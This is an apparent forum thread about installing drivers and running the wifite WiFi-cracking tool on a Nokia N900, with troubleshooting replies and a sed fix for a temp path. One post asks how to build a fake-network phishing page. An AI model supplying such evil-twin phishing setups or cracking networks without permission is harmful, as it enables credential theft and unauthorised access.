thanks, mr_pingu, that worked for me! :)

Excuse me for being dumb maybe

i don't know how to install those drivers ...
i've got to the error that "justmemory" had , he solved it but I don't know what to do next .
it pisses me off because I got to this part using lots of tutorials and forum threads and i am stuck :(

please give me a hint of what I have to do next to install the updated drivers .

thanks !

Then there is a new version of wifite out. You can update your old version by going to the directory it is hosted in and running:

wifite --update

Just remember to run this script afterwards to fix the temp dir location problem.:

sed -i "s/(prefix='wifite')/(prefix='wifite',dir='\/opt\/tmp')/g" /opt/wifi_mon/wifite.py;

Hello All I know that topic is old, but I have problem..I done all what u write in your guide (check it few times) later I open new x-terminal press root, and write wepon, I have something like that -> /usr/bin/wepon: line 3: /opt/wifi_mon/load.sh: not found python: can't open file '/opt/wifi_mon/wifite.py' : [Errno 2] No such file or directory :( What I can do, u have some idea how solve that? Thanks.

hello karam,
i was wondering how did you create that phishing page using the fake network on the n900?
can you please share instructions on how to set it up and how to install dhcp3-server on maemo? thnx

This is what I got :-s

Hi,

I am also facing the same issue.can you tell me how it is solved??

Thanks.